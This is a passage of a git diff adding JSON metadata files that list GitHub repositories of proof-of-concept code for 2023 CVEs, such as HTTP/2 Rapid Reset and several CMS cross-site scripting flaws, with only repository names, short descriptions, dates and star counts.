"topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44487.json b/2023/CVE-2023-44487.json new file mode 100644 index 0000000000..1012f6d4d8 --- /dev/null +++ b/2023/CVE-2023-44487.json @@ -0,0 +1,441 @@ +[ + { + "id": 703062371, + "name": "CVE-2023-44487", + "full_name": "bcdannyboy\/CVE-2023-44487", + "owner": { + "login": "bcdannyboy", + "id": 12553297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4", + "html_url": "https:\/\/github.com\/bcdannyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2023-44487", + "description": "Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487", + "fork": false, + "created_at": "2023-10-10T14:20:42Z", + "updated_at": "2024-11-22T12:42:49Z", + "pushed_at": "2024-01-08T11:12:08Z", + "stargazers_count": 225, + "watchers_count": 225, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 49, + "watchers": 225, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 703303512, + "name": "CVE-2023-44487", + "full_name": "imabee101\/CVE-2023-44487", + "owner": { + "login": "imabee101", + "id": 29169122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29169122?v=4", + "html_url": "https:\/\/github.com\/imabee101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imabee101\/CVE-2023-44487", + "description": "Proof of concept for DoS exploit ", + "fork": false, + "created_at": "2023-10-11T01:59:47Z", + "updated_at": "2024-10-11T01:41:10Z", + "pushed_at": "2023-10-13T11:19:10Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-44487", + "ddos", + "dos", + "dos-attack", + "poc", + "proof-of-concept" + ], + "visibility": "public", + "forks": 16, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703845749, + "name": "CVE-2023-44487", + "full_name": "ByteHackr\/CVE-2023-44487", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/CVE-2023-44487", + "description": "Test Script for CVE-2023-44487", + "fork": false, + "created_at": "2023-10-12T03:14:34Z", + "updated_at": "2023-10-12T03:30:38Z", + "pushed_at": "2023-10-12T03:30:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703914770, + "name": "rapidreset", + "full_name": "pabloec20\/rapidreset", + "owner": { + "login": "pabloec20", + "id": 24191742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24191742?v=4", + "html_url": "https:\/\/github.com\/pabloec20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pabloec20\/rapidreset", + "description": "CVE-2023-44487", + "fork": false, + "created_at": "2023-10-12T07:06:42Z", + "updated_at": "2024-06-27T16:58:23Z", + "pushed_at": "2023-10-12T07:11:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704732969, + "name": "rapidresetclient", + "full_name": "secengjeff\/rapidresetclient", + "owner": { + "login": "secengjeff", + "id": 146767590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146767590?v=4", + "html_url": "https:\/\/github.com\/secengjeff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secengjeff\/rapidresetclient", + "description": "Tool for testing mitigations and exposure to Rapid Reset DDoS (CVE-2023-44487)", + "fork": false, + "created_at": "2023-10-13T23:55:32Z", + "updated_at": "2024-11-17T12:51:41Z", + "pushed_at": "2023-10-30T20:22:37Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 61, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 705614213, + "name": "CVE-2023-44487", + "full_name": "studiogangster\/CVE-2023-44487", + "owner": { + "login": "studiogangster", + "id": 12793420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12793420?v=4", + "html_url": "https:\/\/github.com\/studiogangster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/studiogangster\/CVE-2023-44487", + "description": "A python based exploit to test out rapid reset attack (CVE-2023-44487)", + "fork": false, + "created_at": "2023-10-16T11:07:50Z", + "updated_at": "2024-08-11T14:52:28Z", + "pushed_at": "2023-10-16T12:32:50Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-44487", + "cybersecurity", + "exploit", + "http2", + "rapid", + "rapid-reset", + "reset", + "security", + "zero-day" + ], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709722803, + "name": "golang-CVE-2023-44487", + "full_name": "ReToCode\/golang-CVE-2023-44487", + "owner": { + "login": "ReToCode", + "id": 16611466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16611466?v=4", + "html_url": "https:\/\/github.com\/ReToCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReToCode\/golang-CVE-2023-44487", + "description": null, + "fork": false, + "created_at": "2023-10-25T09:11:46Z", + "updated_at": "2024-09-26T01:42:32Z", + "pushed_at": "2023-10-26T15:01:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716296930, + "name": "http2-rst-stream-attacker", + "full_name": "ndrscodes\/http2-rst-stream-attacker", + "owner": { + "login": "ndrscodes", + "id": 62462135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62462135?v=4", + "html_url": "https:\/\/github.com\/ndrscodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ndrscodes\/http2-rst-stream-attacker", + "description": "Highly configurable tool to check a server's vulnerability against CVE-2023-44487 by rapidly sending HEADERS and RST_STREAM frames and documenting the server's responses.", + "fork": false, + "created_at": "2023-11-08T20:56:22Z", + "updated_at": "2024-09-11T05:27:59Z", + "pushed_at": "2024-01-11T17:44:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-44487", + "go", + "golang", + "http2", + "it-security", + "itsec", + "itsecurity", + "research", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716960166, + "name": "cve-2023-44487", + "full_name": "nxenon\/cve-2023-44487", + "owner": { + "login": "nxenon", + "id": 61124903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61124903?v=4", + "html_url": "https:\/\/github.com\/nxenon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nxenon\/cve-2023-44487", + "description": "Examples for Implementing cve-2023-44487 ( HTTP\/2 Rapid Reset Attack ) Concept", + "fork": false, + "created_at": "2023-11-10T08:38:51Z", + "updated_at": "2024-11-09T09:55:37Z", + "pushed_at": "2023-11-10T08:39:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-44487", + "ddos", + "dos", + "http2", + "rapid-reset", + "rapid-reset-attack" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723118471, + "name": "HTTP-2-Rapid-Reset-Client", + "full_name": "terrorist\/HTTP-2-Rapid-Reset-Client", + "owner": { + "login": "terrorist", + "id": 108696846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108696846?v=4", + "html_url": "https:\/\/github.com\/terrorist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/terrorist\/HTTP-2-Rapid-Reset-Client", + "description": "A tool to check how well a system can handle Rapid Reset DDoS attacks (CVE-2023-44487).", + "fork": false, + "created_at": "2023-11-24T18:26:36Z", + "updated_at": "2024-09-02T12:43:28Z", + "pushed_at": "2023-11-24T20:19:44Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 48, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 730433558, + "name": "CVE-2023-44487-", + "full_name": "sigridou\/CVE-2023-44487-", + "owner": { + "login": "sigridou", + "id": 101998818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101998818?v=4", + "html_url": "https:\/\/github.com\/sigridou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sigridou\/CVE-2023-44487-", + "description": null, + "fork": false, + "created_at": "2023-12-11T23:12:03Z", + "updated_at": "2023-12-11T23:13:25Z", + "pushed_at": "2023-12-11T23:19:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790095472, + "name": "cve-2023-44487", + "full_name": "TYuan0816\/cve-2023-44487", + "owner": { + "login": "TYuan0816", + "id": 91544853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91544853?v=4", + "html_url": "https:\/\/github.com\/TYuan0816", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TYuan0816\/cve-2023-44487", + "description": null, + "fork": false, + "created_at": "2024-04-22T08:56:39Z", + "updated_at": "2024-04-22T08:56:43Z", + "pushed_at": "2024-04-22T08:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806127239, + "name": "CVE-2023-44487", + "full_name": "sn130hk\/CVE-2023-44487", + "owner": { + "login": "sn130hk", + "id": 166270187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166270187?v=4", + "html_url": "https:\/\/github.com\/sn130hk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sn130hk\/CVE-2023-44487", + "description": null, + "fork": false, + "created_at": "2024-05-26T13:01:01Z", + "updated_at": "2024-05-26T13:01:01Z", + "pushed_at": "2024-05-26T13:01:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4450.json b/2023/CVE-2023-4450.json new file mode 100644 index 0000000000..c31ba39ca8 --- /dev/null +++ b/2023/CVE-2023-4450.json @@ -0,0 +1,33 @@ +[ + { + "id": 753929545, + "name": "CVE-2023-4450-Attack", + "full_name": "ilikeoyt\/CVE-2023-4450-Attack", + "owner": { + "login": "ilikeoyt", + "id": 122429787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122429787?v=4", + "html_url": "https:\/\/github.com\/ilikeoyt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ilikeoyt\/CVE-2023-4450-Attack", + "description": null, + "fork": false, + "created_at": "2024-02-07T03:51:34Z", + "updated_at": "2024-09-12T01:54:57Z", + "pushed_at": "2024-02-07T06:34:02Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4460.json b/2023/CVE-2023-4460.json new file mode 100644 index 0000000000..c690e1e328 --- /dev/null +++ b/2023/CVE-2023-4460.json @@ -0,0 +1,35 @@ +[ + { + "id": 677181767, + "name": "poc-cve-xss-uploading-svg", + "full_name": "0xn4d\/poc-cve-xss-uploading-svg", + "owner": { + "login": "0xn4d", + "id": 85083396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4", + "html_url": "https:\/\/github.com\/0xn4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-uploading-svg", + "description": "CVE-2023-4460", + "fork": false, + "created_at": "2023-08-11T00:11:45Z", + "updated_at": "2023-08-21T18:17:13Z", + "pushed_at": "2023-08-11T00:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-4460" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44758.json b/2023/CVE-2023-44758.json new file mode 100644 index 0000000000..21d72fac62 --- /dev/null +++ b/2023/CVE-2023-44758.json @@ -0,0 +1,33 @@ +[ + { + "id": 696286258, + "name": "CVE-2023-44758_GDidees-CMS-Stored-XSS---Title", + "full_name": "sromanhu\/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title", + "description": "GDidees CMS 3.9.2 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title", + "fork": false, + "created_at": "2023-09-25T13:07:05Z", + "updated_at": "2023-10-06T14:04:56Z", + "pushed_at": "2023-09-25T13:26:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44760.json b/2023/CVE-2023-44760.json new file mode 100644 index 0000000000..19774182af --- /dev/null +++ b/2023/CVE-2023-44760.json @@ -0,0 +1,33 @@ +[ + { + "id": 696301802, + "name": "CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes", + "full_name": "sromanhu\/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes", + "description": "Multiple Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics", + "fork": false, + "created_at": "2023-09-25T13:39:24Z", + "updated_at": "2023-10-06T14:05:44Z", + "pushed_at": "2023-09-25T13:46:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44761.json b/2023/CVE-2023-44761.json new file mode 100644 index 0000000000..d708aaa5e6 --- /dev/null +++ b/2023/CVE-2023-44761.json @@ -0,0 +1,33 @@ +[ + { + "id": 696493859, + "name": "CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms", + "full_name": "sromanhu\/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Form of the Data Objects.", + "fork": false, + "created_at": "2023-09-25T21:21:10Z", + "updated_at": "2023-10-06T14:06:13Z", + "pushed_at": "2023-09-25T21:39:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44762.json b/2023/CVE-2023-44762.json new file mode 100644 index 0000000000..e514dc9215 --- /dev/null +++ b/2023/CVE-2023-44762.json @@ -0,0 +1,33 @@ +[ + { + "id": 696500172, + "name": "CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags", + "full_name": "sromanhu\/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags", + "fork": false, + "created_at": "2023-09-25T21:43:57Z", + "updated_at": "2023-10-06T14:06:37Z", + "pushed_at": "2023-09-25T21:46:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44763.json b/2023/CVE-2023-44763.json new file mode 100644 index 0000000000..6bc5fe0c54 --- /dev/null +++ b/2023/CVE-2023-44763.json @@ -0,0 +1,33 @@ +[ + { + "id": 696503465, + "name": "CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail", + "full_name": "sromanhu\/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail", + "description": "ConcreteCMS v.9.2.1 is affected by Arbitrary File Upload vulnerability that allows Cross-Site Scriting (XSS) Stored.", + "fork": false, + "created_at": "2023-09-25T21:56:34Z", + "updated_at": "2023-10-06T14:07:05Z", + "pushed_at": "2023-09-25T22:05:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44764.json b/2023/CVE-2023-44764.json new file mode 100644 index 0000000000..69ce775b08 --- /dev/null +++ b/2023/CVE-2023-44764.json @@ -0,0 +1,33 @@ +[ + { + "id": 696502329, + "name": "CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation", + "full_name": "sromanhu\/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the SITE from installation or Settings.", + "fork": false, + "created_at": "2023-09-25T21:52:16Z", + "updated_at": "2023-10-06T14:07:37Z", + "pushed_at": "2023-09-25T21:54:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44765.json b/2023/CVE-2023-44765.json new file mode 100644 index 0000000000..6ac468903c --- /dev/null +++ b/2023/CVE-2023-44765.json @@ -0,0 +1,33 @@ +[ + { + "id": 696490972, + "name": "CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations", + "full_name": "sromanhu\/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Plural Handle of the Data Objects from System & Settings", + "fork": false, + "created_at": "2023-09-25T21:11:14Z", + "updated_at": "2023-10-06T14:08:14Z", + "pushed_at": "2023-09-25T21:19:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44766.json b/2023/CVE-2023-44766.json new file mode 100644 index 0000000000..a7f8097aa0 --- /dev/null +++ b/2023/CVE-2023-44766.json @@ -0,0 +1,33 @@ +[ + { + "id": 696501225, + "name": "CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO", + "full_name": "sromanhu\/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Header Extra Content from Page Settings. ", + "fork": false, + "created_at": "2023-09-25T21:48:07Z", + "updated_at": "2023-10-06T14:08:47Z", + "pushed_at": "2023-09-25T21:50:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44767.json b/2023/CVE-2023-44767.json new file mode 100644 index 0000000000..c3c0e15da5 --- /dev/null +++ b/2023/CVE-2023-44767.json @@ -0,0 +1,33 @@ +[ + { + "id": 695156657, + "name": "CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager", + "full_name": "sromanhu\/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager", + "description": "RiteCMS 3.0 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up", + "fork": false, + "created_at": "2023-09-22T13:31:18Z", + "updated_at": "2023-10-06T14:09:21Z", + "pushed_at": "2023-09-22T13:39:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44769.json b/2023/CVE-2023-44769.json new file mode 100644 index 0000000000..a18f1bb213 --- /dev/null +++ b/2023/CVE-2023-44769.json @@ -0,0 +1,33 @@ +[ + { + "id": 697995967, + "name": "CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias", + "full_name": "sromanhu\/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias", + "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Spare aliases from Alias.", + "fork": false, + "created_at": "2023-09-28T23:08:12Z", + "updated_at": "2023-10-06T14:09:50Z", + "pushed_at": "2023-09-28T23:15:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44770.json b/2023/CVE-2023-44770.json new file mode 100644 index 0000000000..c3664509a0 --- /dev/null +++ b/2023/CVE-2023-44770.json @@ -0,0 +1,33 @@ +[ + { + "id": 697998333, + "name": "CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias", + "full_name": "sromanhu\/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias", + "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Spare alias from organizer.", + "fork": false, + "created_at": "2023-09-28T23:18:07Z", + "updated_at": "2023-10-06T14:10:32Z", + "pushed_at": "2023-09-28T23:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44771.json b/2023/CVE-2023-44771.json new file mode 100644 index 0000000000..92f2c6fa31 --- /dev/null +++ b/2023/CVE-2023-44771.json @@ -0,0 +1,33 @@ +[ + { + "id": 697994632, + "name": "CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout", + "full_name": "sromanhu\/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout", + "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Layout", + "fork": false, + "created_at": "2023-09-28T23:02:00Z", + "updated_at": "2023-10-06T14:11:18Z", + "pushed_at": "2023-09-28T23:05:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44811.json b/2023/CVE-2023-44811.json new file mode 100644 index 0000000000..8c2d6e3c59 --- /dev/null +++ b/2023/CVE-2023-44811.json @@ -0,0 +1,33 @@ +[ 